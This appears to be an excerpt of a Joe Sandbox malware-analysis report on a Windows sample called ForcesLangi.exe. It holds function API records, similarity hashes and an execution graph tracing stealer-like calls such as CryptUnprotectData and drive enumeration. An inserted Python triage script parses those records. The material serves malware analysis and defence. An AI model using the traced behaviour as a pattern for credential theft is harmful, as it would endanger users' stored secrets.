                                                                                                                                                                                                                                              • Instruction ID: 7da7e9c8620e88f32a8397b8b27a62a830a4f8d431ae5f258c07e3e37c794c2d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: baf2d368a663e3fd086bcce10756650e1262356d5b3c6b3ee5c8558503877a51
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC01D83630E6726EEA1405F55C88E563775DB433BC730132EE12C85AD0EF55E846F698
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\Desktop\ForcesLangi.exe, xrefs: 6CE33672
                                                                                                                                                                                                                                              Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID:
• String ID: C:\Users\user\Desktop\ForcesLangi.exe
• API String ID: 0-1466808870
• Opcode ID: b026a6e39f5f10b098e7da0426f64c07aca047fe2c3eb67a8fd70f5b458b1d60
• Instruction ID: 5ae47eed08b3985edd8f07990a4bd861b2336d540dfe7aba2701f63c893c8609
• Opcode Fuzzy Hash: b026a6e39f5f10b098e7da0426f64c07aca047fe2c3eb67a8fd70f5b458b1d60
• Instruction Fuzzy Hash: 1F21B3B1204225AFDB109A668C88D97B77DAF013BC7245629F45DC7B40EB21FC56CBA0
APIs
• FreeLibrary.KERNEL32(00000000,?,?,6CE31214,00000000,?,00000001,00000000,?,6CE3128B,00000001,FlsFree,6CE3B344,FlsFree,00000000), ref: 6CE311E3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-
• API String ID: 3664257935-2084034818
• Opcode ID: 92b3b385346ebe6712506d35d43b8aa5483a2f7d6bf3294cff671c1cadb1dd51
• Instruction ID: 60835f865c34a5a7607a86989b14cc80c9290d65e58d6853946fde49798c0ede
• Opcode Fuzzy Hash: 92b3b385346ebe6712506d35d43b8aa5483a2f7d6bf3294cff671c1cadb1dd51
• Instruction Fuzzy Hash: 9811A333B45639ABDF228AE98C44B9937B49F027B8F351214E91CEB780D760F904CAD5
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CE31B19,?,?,6CE31AE1,?,00000001,?), ref: 6CE31B7C
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CE31B8F
• FreeLibrary.KERNEL32(00000000,?,?,6CE31B19,?,?,6CE31AE1,?,00000001,?), ref: 6CE31BB2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 739af7f1296f14c9ab567f9a6e0ee39e912456cfb9e9271e33966bd05a20a2ce
• Instruction ID: 36840aef5c42c492fbdf76fce1925dd507c87276e09843351a47df091e231d42
• Opcode Fuzzy Hash: 739af7f1296f14c9ab567f9a6e0ee39e912456cfb9e9271e33966bd05a20a2ce
• Instruction Fuzzy Hash: 7EF01231A41628FBDF119BD1CD09B9D7A79EB4175AF205054E409A2550DB34EA40DB90
APIs
• _free.LIBCMT ref: 6CE3744D
  • Part of subcall function 6CE32CE7: HeapFree.KERNEL32(00000000,00000000,?,6CE321F9), ref: 6CE32CFD
  • Part of subcall function 6CE32CE7: GetLastError.KERNEL32(?,?,6CE321F9), ref: 6CE32D0F
• _free.LIBCMT ref: 6CE3745F
• _free.LIBCMT ref: 6CE37471
• _free.LIBCMT ref: 6CE37483
• _free.LIBCMT ref: 6CE37495
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 99fadec0f20956cbf7bec20e4786c7ec579e2a0087a39ff34ca8460e69511b45
• Instruction ID: 68288891fd578538364034f08ac89119f0e2ce30ce7d3de14d0c30dfe22a7d7e
• Opcode Fuzzy Hash: 99fadec0f20956cbf7bec20e4786c7ec579e2a0087a39ff34ca8460e69511b45
• Instruction Fuzzy Hash: 10F04431606BA4978A10DA64E684C5677F9FB8232C7706809F06DD7B00C731F884CA90
APIs
  • Part of subcall function 6CE33527: _free.LIBCMT ref: 6CE33535
  • Part of subcall function 6CE340FB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CE36093,?,00000000,00000000), ref: 6CE341A7
• GetLastError.KERNEL32 ref: 6CE32F6D
• __dosmaperr.LIBCMT ref: 6CE32F74
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CE32FB3
• __dosmaperr.LIBCMT ref: 6CE32FBA
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
• String ID:
• API String ID: 167067550-0
• Opcode ID: 14c126fea042647f6268fc4068899733fe312fbeada0b96be32a5793e5147fab
• Instruction ID: 14565cae5cc47ca762535df147e7741c0d47e32a5003b0bf53ebc42423db6917
• Opcode Fuzzy Hash: 14c126fea042647f6268fc4068899733fe312fbeada0b96be32a5793e5147fab
• Instruction Fuzzy Hash: 0221D1716042256F9B105F668C858ABB7BCAF1536C7245619F4ACA7B45D730FC41CBE0
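Each record above lists the APIs a function calls and condenses them into an "API ID" used for similarity matching. The Python below is an added example, not Joe Sandbox code or output: it parses "APIs" lines copied from the five records above (a constructed sample), rebuilds each API ID by a rule inferred from those records (drop the Get/Set/Ex/W/To fragments, split CamelCase names, dedupe, sort by code point, join; direct calls and subcall APIs separated by "$"; Joe Sandbox's real derivation is not documented on this page, so this is a reconstruction that merely agrees with the records shown), and tags the MSVC CRT exit stub (GetModuleHandleExW on mscoree.dll followed by GetProcAddress of CorExitProcess) and CRT memory/error helpers so they can be filtered out of triage before looking at the stealer's own code. The triage labels, the noise-word list and the "A" suffix are this example's assumptions.

```python
"""Parse Joe Sandbox per-function "APIs" records and rebuild their API ID.

Added example, not Joe Sandbox code. The API ID rule is inferred from the
records on the page; the triage labels are ours.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: "APIs" lines copied from five function records on this page.
SAMPLE = """\
APIs
• FreeLibrary.KERNEL32(00000000,?,?,6CE31214,00000000,?,00000001,00000000,?,6CE3128B,00000001,FlsFree,6CE3B344,FlsFree,00000000), ref: 6CE311E3
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CE31B19,?,?,6CE31AE1,?,00000001,?), ref: 6CE31B7C
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CE31B8F
• FreeLibrary.KERNEL32(00000000,?,?,6CE31B19,?,?,6CE31AE1,?,00000001,?), ref: 6CE31BB2
APIs
• _free.LIBCMT ref: 6CE3744D
  • Part of subcall function 6CE32CE7: HeapFree.KERNEL32(00000000,00000000,?,6CE321F9), ref: 6CE32CFD
  • Part of subcall function 6CE32CE7: GetLastError.KERNEL32(?,?,6CE321F9), ref: 6CE32D0F
• _free.LIBCMT ref: 6CE3745F
APIs
  • Part of subcall function 6CE33527: _free.LIBCMT ref: 6CE33535
  • Part of subcall function 6CE340FB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CE36093,?,00000000,00000000), ref: 6CE341A7
• GetLastError.KERNEL32 ref: 6CE32F6D
• __dosmaperr.LIBCMT ref: 6CE32F74
APIs
• GetLastError.KERNEL32(?,?,?,6CE36A37,?,00000001,6CE34E8A,?,6CE36EF1,00000001,?,?,?,6CE34E19,?,00000000), ref: 6CE329AC
• _free.LIBCMT ref: 6CE32A09
• SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6CE36EF1,00000001,?,?,?,6CE34E19,?,00000000,00000000,6CE3FB78,0000002C,6CE34E8A), ref: 6CE32A4A
"""

# One call line: optional "Part of subcall function X:" prefix, Api.MODULE,
# optional (args), optional comma, then "ref: ADDR".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Fragments the page's API IDs drop: Get/Set/Ex/W/To are observed; "A" is assumed by analogy with W.
NOISE = {"Get", "Set", "Ex", "W", "A", "To"}


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None  # address of the callee when the API is reached via a subcall


@dataclass
class FunctionRecord:
    calls: List[Call] = field(default_factory=list)

    @property
    def direct(self) -> List[Call]:
        return [c for c in self.calls if c.subcall_of is None]

    @property
    def nested(self) -> List[Call]:
        return [c for c in self.calls if c.subcall_of is not None]


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the report text at each 'APIs' header and collect the call lines under it."""
    records: List[FunctionRecord] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append(FunctionRecord())
            continue
        m = CALL_RE.match(line)
        if m and records:
            args = m["args"].split(",") if m["args"] is not None else []
            records[-1].calls.append(Call(m["api"], m["mod"], args, m["ref"], m["sub"]))
    return records


def name_tokens(api: str) -> List[str]:
    """CRT internals (_free, __dosmaperr) stay whole; Win32 names split on CamelCase minus NOISE."""
    if api.startswith("_"):
        return [api]
    return [t for t in re.findall(r"[A-Z][a-z0-9]*", api) if t not in NOISE]


def api_id(rec: FunctionRecord) -> str:
    """Reconstructed API ID: sorted unique tokens of direct calls, '$', same for subcall APIs."""
    parts = []
    for group in (rec.direct, rec.nested):
        toks = sorted({t for c in group for t in name_tokens(c.api)})
        if toks:
            parts.append("".join(toks))
    return "$".join(parts)


def classify(rec: FunctionRecord) -> str:
    """Heuristic triage label (our naming) to separate CRT boilerplate from code worth reading."""
    apis = {c.api for c in rec.calls}
    args = {a for c in rec.calls for a in c.args}
    if "GetModuleHandleExW" in apis and "mscoree.dll" in args and "CorExitProcess" in args:
        # MSVC CRT exit path: if the CLR is loaded, exit through CorExitProcess.
        return "crt-exit-stub"
    crt_helpers = {"HeapFree", "GetLastError", "SetLastError", "WideCharToMultiByte"}
    if all(c.module == "LIBCMT" or c.api in crt_helpers for c in rec.calls):
        return "crt-runtime"
    return "review"


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(f"{classify(rec):14s} {api_id(rec)}")
```

The reconstruction reproduces all five API IDs shown on this page, which is a reasonable check that the rule is right for these cases, but it should be re-validated against any record whose ID it fails to match rather than trusted as the tool's algorithm.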
APIs
• GetLastError.KERNEL32(?,?,?,6CE36A37,?,00000001,6CE34E8A,?,6CE36EF1,00000001,?,?,?,6CE34E19,?,00000000), ref: 6CE329AC
• _free.LIBCMT ref: 6CE32A09
• _free.LIBCMT ref: 6CE32A3F
• SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6CE36EF1,00000001,?,?,?,6CE34E19,?,00000000,00000000,6CE3FB78,0000002C,6CE34E8A), ref: 6CE32A4A
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID: ErrorLast_free
• String ID:
• API String ID: 2283115069-0
• Opcode ID: 2098c9badd962ab94e434845881b313f6ff675ab96698e14fa537d499e436228
                                                                                                                                                                                                                                              • Instruction ID: 4d73798edca26e9659cb7cb5ace5f0a2b7cab87b18bd8a6697a9daae2fcf2b9a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2098c9badd962ab94e434845881b313f6ff675ab96698e14fa537d499e436228
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F41127363451352B9B1105B84C8CE66357A9BD377C735222AF16CC3B81EF31A80AC5E0
APIs
• GetLastError.KERNEL32(?,?,00000001,6CE32DD0,6CE32D0D,?,?,6CE321F9), ref: 6CE32B03
• _free.LIBCMT ref: 6CE32B60
• _free.LIBCMT ref: 6CE32B96
• SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,00000001,6CE32DD0,6CE32D0D,?,?,6CE321F9), ref: 6CE32BA1
Similarity
• API ID: ErrorLast_free
• String ID:
• API String ID: 2283115069-0
• Opcode ID: acf56761ac17de2f9bbeff908b6a1e531e0321b96b1366fa9f3788bb7335721a
• Instruction ID: e45a30f417e6860ccc17544f9a1af8ea0c0527f9dc4f29de97f4b07aa2d55639
• Opcode Fuzzy Hash: acf56761ac17de2f9bbeff908b6a1e531e0321b96b1366fa9f3788bb7335721a
• Instruction Fuzzy Hash: A311E7357416362ADB0109695C88E66257AABD377C7341229F16CC3781DF21A809C5A0
APIs
• WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CE376E0,?,00000001,?,00000001,?,6CE369C6,?,?,00000001), ref: 6CE37C9D
• GetLastError.KERNEL32(?,6CE376E0,?,00000001,?,00000001,?,6CE369C6,?,?,00000001,?,00000001,?,6CE36F12,6CE34E19), ref: 6CE37CA9
  • Part of subcall function 6CE37C6F: CloseHandle.KERNEL32(FFFFFFFE,6CE37CB9,?,6CE376E0,?,00000001,?,00000001,?,6CE369C6,?,?,00000001,?,00000001), ref: 6CE37C7F
• ___initconout.LIBCMT ref: 6CE37CB9
  • Part of subcall function 6CE37C31: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CE37C60,6CE376CD,00000001,?,6CE369C6,?,?,00000001,?), ref: 6CE37C44
• WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CE376E0,?,00000001,?,00000001,?,6CE369C6,?,?,00000001,?), ref: 6CE37CCE
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
• Opcode ID: dd53351206900c1c32c072ddae400f03e15c03225856c80837f46e574a6d6b52
• Instruction ID: c5ee740eeaa739be596fe3fdc739f5bd7e32cf6af160e539bc69e6f7ef687cc2
• Opcode Fuzzy Hash: dd53351206900c1c32c072ddae400f03e15c03225856c80837f46e574a6d6b52
• Instruction Fuzzy Hash: 00F03036640129FBCF226FD5CD04E8A3FB6FB4A3E4B164010FA1CA5620C736A960DF90
Strings
Similarity
• API ID:
• String ID: C:\Users\user\Desktop\ForcesLangi.exe
• API String ID: 0-1466808870
• Opcode ID: bbae7079d354c855fdf4e77d4e562726321b8d69b1730892759dd7a0a9516843
• Instruction ID: 8a8e6ead444ac1211679c626dfe85b7a02190bf81a422816594e9e7c571dab4e
• Opcode Fuzzy Hash: bbae7079d354c855fdf4e77d4e562726321b8d69b1730892759dd7a0a9516843
• Instruction Fuzzy Hash: 0B418271A00229ABCB169BD98884DDEBBF8EFC6718F31106EE418E7740D770EA45C790
APIs
• RaiseException.KERNEL32(E06D7363,00000001,00000003,Zl,?,?,?,6CE2EB5A,?,6CE3F86C), ref: 6CE2FB20
Strings
Similarity
• API ID: ExceptionRaise
• String ID: Zl$Zl
• API String ID: 3997070919-2072720850
• Opcode ID: 0b86cc849ebec441a0067b24bedf6a1a7ad1c4b2f9c35cb29ed226395ab89d5e
• Instruction ID: a14331206312b36cf44d02ff620a89e8f8d939fa792b3cc97dff39b39e9e6ef7
• Opcode Fuzzy Hash: 0b86cc849ebec441a0067b24bedf6a1a7ad1c4b2f9c35cb29ed226395ab89d5e
• Instruction Fuzzy Hash: 9801A276A0021CABCB019F58C580BAEBBB8FF44708F314159E915AB790D7B8E900CB90

Execution Graph

Execution Coverage: 8.7%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 59.7%
Total number of Nodes: 481
Total number of Limit Nodes: 35
14456 75e110 LdrInitializeThunk 14435->14456 14436 75c570 RtlFreeHeap 14436->14433 14438->14436 14440 75c841 14439->14440 14441 75c8fe 14439->14441 14440->14441 14457 75e110 LdrInitializeThunk 14440->14457 14441->14406 14445 75ce40 14443->14445 14444 75d60e 14444->14406 14450 75ce9e 14445->14450 14458 75e110 LdrInitializeThunk 14445->14458 14447 75d59a 14447->14444 14459 75e110 LdrInitializeThunk 14447->14459 14449 75e110 LdrInitializeThunk 14449->14450 14450->14444 14450->14447 14450->14449 14452 747749 14451->14452 14453 75c99a 14451->14453 14452->14349 14452->14410 14453->14452 14460 75e110 LdrInitializeThunk 14453->14460 14455->14435 14456->14438 14457->14441 14458->14450 14459->14444 14460->14452 14462 760d2f 14461->14462 14465 760e98 14462->14465 14470 75e110 LdrInitializeThunk 14462->14470 14464 75c570 RtlFreeHeap 14466 76114b 14464->14466 14465->14466 14468 76108e 14465->14468 14471 75e110 LdrInitializeThunk 14465->14471 14466->14416 14468->14464 14469->14416 14470->14465 14471->14468 14472->14418 14473->14423 14474->14427 14475->14428 14476 7439b9 14478 74374a 14476->14478 14479 743406 14476->14479 14477 743b50 RtlExpandEnvironmentStrings 14481 743c50 14477->14481 14478->14476 14478->14477 14478->14478 14478->14479 14478->14481 14486 743ce2 14478->14486 14504 75e110 LdrInitializeThunk 14478->14504 14481->14479 14482 743c9e RtlExpandEnvironmentStrings 14481->14482 14483 743f58 14481->14483 14481->14486 14489 743def 14481->14489 14482->14479 14482->14483 14482->14486 14482->14489 14483->14479 14483->14483 14491 741d00 14483->14491 14486->14486 14487 7614b0 LdrInitializeThunk 14486->14487 14487->14489 14488 743f41 GetLogicalDrives 14490 7614b0 LdrInitializeThunk 14488->14490 14489->14479 14489->14483 14489->14488 14489->14489 14490->14483 14492 761320 LdrInitializeThunk 14491->14492 14496 741d43 14492->14496 14493 7423f5 14493->14479 14495 75c570 RtlFreeHeap 14497 74239e 14495->14497 14496->14493 14503 741de9 14496->14503 14505 75e110 LdrInitializeThunk 
14496->14505 14497->14493 14507 75e110 LdrInitializeThunk 14497->14507 14498 742383 14498->14495 14500 74245a 14498->14500 14502 75c570 RtlFreeHeap 14502->14503 14503->14498 14503->14502 14506 75e110 LdrInitializeThunk 14503->14506 14504->14478 14505->14496 14506->14503 14507->14497 14508 757764 14509 75777c 14508->14509 14510 75779d GetUserDefaultUILanguage 14509->14510 14511 7577c7 14510->14511 14512 75e967 14513 75e980 14512->14513 14516 75e110 LdrInitializeThunk 14513->14516 14515 75e9ef 14516->14515 14517 731227 14518 731241 14517->14518 14519 7314e5 RtlExpandEnvironmentStrings 14518->14519 14523 72f444 14518->14523 14524 731562 14519->14524 14520 728b60 ExitProcess 14521 731c4e 14520->14521 14525 7357c0 14521->14525 14524->14520 14524->14523 14526 7357e0 14525->14526 14526->14526 14527 761320 LdrInitializeThunk 14526->14527 14528 7358ed 14527->14528 14529 735cad 14528->14529 14530 73590f 14528->14530 14531 761650 LdrInitializeThunk 14528->14531 14535 73594e 14528->14535 14536 735ae8 14528->14536 14538 735b92 14528->14538 14534 761650 LdrInitializeThunk 14529->14534 14529->14535 14540 735cf7 14529->14540 14530->14529 14532 761720 LdrInitializeThunk 14530->14532 14530->14535 14530->14536 14530->14538 14531->14530 14533 73593f 14532->14533 14533->14529 14533->14535 14533->14536 14533->14538 14534->14540 14535->14523 14536->14535 14606 75e110 LdrInitializeThunk 14536->14606 14537 7360df 14537->14523 14554 736319 14537->14554 14559 73634d 14537->14559 14562 73c8a0 14537->14562 14541 761320 LdrInitializeThunk 14538->14541 14540->14537 14542 761720 LdrInitializeThunk 14540->14542 14548 7360b5 CryptUnprotectData 14540->14548 14561 75e110 LdrInitializeThunk 14540->14561 14541->14529 14542->14540 14547 736f0e 14548->14537 14548->14540 14549 7365bd 14550 73c8a0 3 API calls 14549->14550 14550->14535 14553 7368eb 14553->14547 14553->14553 14609 75e110 LdrInitializeThunk 14553->14609 14574 739ad0 14554->14574 14555 73731b 14557 7366be 14558 736792 14557->14558 14607 75e110 
LdrInitializeThunk 14557->14607 14558->14553 14608 75e110 LdrInitializeThunk 14558->14608 14559->14535 14559->14549 14560 7614b0 LdrInitializeThunk 14559->14560 14560->14559 14561->14540 14563 73c8ca 14562->14563 14610 734ca0 14563->14610 14565 73c9cb 14566 734ca0 3 API calls 14565->14566 14567 73ca59 14566->14567 14568 734ca0 3 API calls 14567->14568 14569 73cadf 14568->14569 14570 734ca0 3 API calls 14569->14570 14571 73cbf9 14570->14571 14572 734ca0 3 API calls 14571->14572 14573 73cc62 14572->14573 14573->14554 14575 739b00 14574->14575 14579 739b78 14575->14579 14691 75e110 LdrInitializeThunk 14575->14691 14577 739cbe 14582 739d6e 14577->14582 14599 736338 14577->14599 14693 75e110 LdrInitializeThunk 14577->14693 14579->14577 14692 75e110 LdrInitializeThunk 14579->14692 14581 739eef 14583 75c570 RtlFreeHeap 14581->14583 14582->14581 14590 739f48 14582->14590 14694 75e110 LdrInitializeThunk 14582->14694 14583->14590 14585 73a2a7 FreeLibrary 14589 73a157 14585->14589 14587 73a152 14587->14585 14588 73a216 FreeLibrary 14587->14588 14592 73a230 14588->14592 14589->14599 14696 75e110 LdrInitializeThunk 14589->14696 14590->14585 14590->14587 14590->14589 14590->14599 14695 75e110 LdrInitializeThunk 14590->14695 14594 73a2a2 14592->14594 14697 75e110 LdrInitializeThunk 14592->14697 14596 73a3fe 14594->14596 14698 75e110 LdrInitializeThunk 14594->14698 14596->14599 14605 73a4de 14596->14605 14699 75e110 LdrInitializeThunk 14596->14699 14597 73ac58 14598 75c570 RtlFreeHeap 14597->14598 14598->14599 14599->14557 14599->14559 14601 75c830 LdrInitializeThunk 14601->14605 14602 75c990 LdrInitializeThunk 14602->14605 14603 75c570 RtlFreeHeap 14603->14605 14604 75e110 LdrInitializeThunk 14604->14605 14605->14597 14605->14601 14605->14602 14605->14603 14605->14604 14606->14557 14607->14558 14608->14553 14609->14555 14611 734cc0 14610->14611 14612 761320 LdrInitializeThunk 14611->14612 14613 734e14 14612->14613 14614 761320 LdrInitializeThunk 14613->14614 14644 735021 
14614->14644 14615 73509e 14616 7350e9 14615->14616 14617 73522e 14615->14617 14648 735170 14615->14648 14619 75c570 RtlFreeHeap 14616->14619 14617->14565 14622 7350ef 14619->14622 14620 735551 14669 75e110 LdrInitializeThunk 14620->14669 14623 735152 14622->14623 14678 75e110 LdrInitializeThunk 14622->14678 14624 7357b0 14623->14624 14625 7356a1 14623->14625 14626 7355d3 14623->14626 14627 7356d2 14623->14627 14628 73579e 14623->14628 14629 735625 14623->14629 14632 75c5a0 2 API calls 14623->14632 14637 73563c 14623->14637 14647 735696 14623->14647 14649 7355ff 14623->14649 14634 75c990 LdrInitializeThunk 14624->14634 14625->14627 14630 761650 LdrInitializeThunk 14625->14630 14625->14637 14625->14647 14625->14649 14626->14624 14626->14625 14626->14627 14626->14628 14626->14629 14626->14637 14626->14647 14626->14649 14670 75ca40 14626->14670 14631 761650 LdrInitializeThunk 14627->14631 14633 75c990 LdrInitializeThunk 14628->14633 14636 761320 LdrInitializeThunk 14629->14636 14630->14627 14631->14637 14640 7355c7 14632->14640 14633->14624 14641 7357b9 14634->14641 14636->14637 14638 761720 LdrInitializeThunk 14637->14638 14637->14647 14637->14649 14638->14637 14639 75e110 LdrInitializeThunk 14639->14648 14645 75c830 LdrInitializeThunk 14640->14645 14641->14641 14644->14615 14644->14616 14644->14648 14651 75e110 LdrInitializeThunk 14644->14651 14645->14626 14647->14649 14679 75e110 LdrInitializeThunk 14647->14679 14648->14617 14648->14620 14648->14639 14652 759d30 14648->14652 14649->14565 14651->14615 14654 759d40 14652->14654 14658 759e53 14654->14658 14680 75e0a0 14654->14680 14687 75e110 LdrInitializeThunk 14654->14687 14656 75a25b 14657 75c570 RtlFreeHeap 14656->14657 14659 75a274 14657->14659 14658->14656 14660 75c830 LdrInitializeThunk 14658->14660 14659->14648 14663 759e9a 14660->14663 14661 75c990 LdrInitializeThunk 14661->14656 14662 75e0a0 2 API calls 14662->14663 14663->14662 14664 75e110 LdrInitializeThunk 14663->14664 14665 75c570 RtlFreeHeap 
14663->14665 14666 75a281 14663->14666 14668 75a25f 14663->14668 14664->14663 14665->14663 14667 75c570 RtlFreeHeap 14666->14667 14667->14668 14668->14661 14669->14622 14671 7355f1 14670->14671 14672 75ca5a 14670->14672 14671->14624 14671->14625 14671->14627 14671->14628 14671->14629 14671->14637 14671->14647 14671->14649 14672->14671 14675 75cae2 14672->14675 14688 75e110 LdrInitializeThunk 14672->14688 14673 75cc4e 14673->14671 14673->14673 14690 75e110 LdrInitializeThunk 14673->14690 14675->14673 14689 75e110 LdrInitializeThunk 14675->14689 14678->14623 14679->14628 14681 75e0c0 14680->14681 14682 75e0f3 14680->14682 14683 75e0d4 14680->14683 14686 75e0e8 14680->14686 14681->14682 14681->14683 14684 75c570 RtlFreeHeap 14682->14684 14685 75e0d9 RtlReAllocateHeap 14683->14685 14684->14686 14685->14686 14686->14654 14687->14654 14688->14675 14689->14673 14690->14671 14691->14579 14692->14577 14693->14582 14694->14581 14695->14587 14696->14599 14697->14594 14698->14596 14699->14605 14700 75e760 14701 75e780 14700->14701 14702 75e7be 14701->14702 14704 75e110 LdrInitializeThunk 14701->14704 14704->14702 14705 75c5a0 14706 75c5d0 14705->14706 14709 75c62e 14706->14709 14713 75e110 LdrInitializeThunk 14706->14713 14707 75c801 14709->14707 14712 75c749 14709->14712 14714 75e110 LdrInitializeThunk 14709->14714 14710 75c570 RtlFreeHeap 14710->14707 14712->14710 14713->14709 14714->14712 14715 758ea0 14716 758ec5 14715->14716 14719 758fc9 14716->14719 14724 75e110 LdrInitializeThunk 14716->14724 14718 759210 14719->14718 14721 7590e1 14719->14721 14723 75e110 LdrInitializeThunk 14719->14723 14721->14718 14725 75e110 LdrInitializeThunk 14721->14725 14723->14719 14724->14716 14725->14721 14726 760d20 14727 760d2f 14726->14727 14730 760e98 14727->14730 14734 75e110 LdrInitializeThunk 14727->14734 14729 75c570 RtlFreeHeap 14731 76114b 14729->14731 14730->14731 14733 76108e 14730->14733 14735 75e110 LdrInitializeThunk 14730->14735 14733->14729 14734->14730 14735->14733 14736 
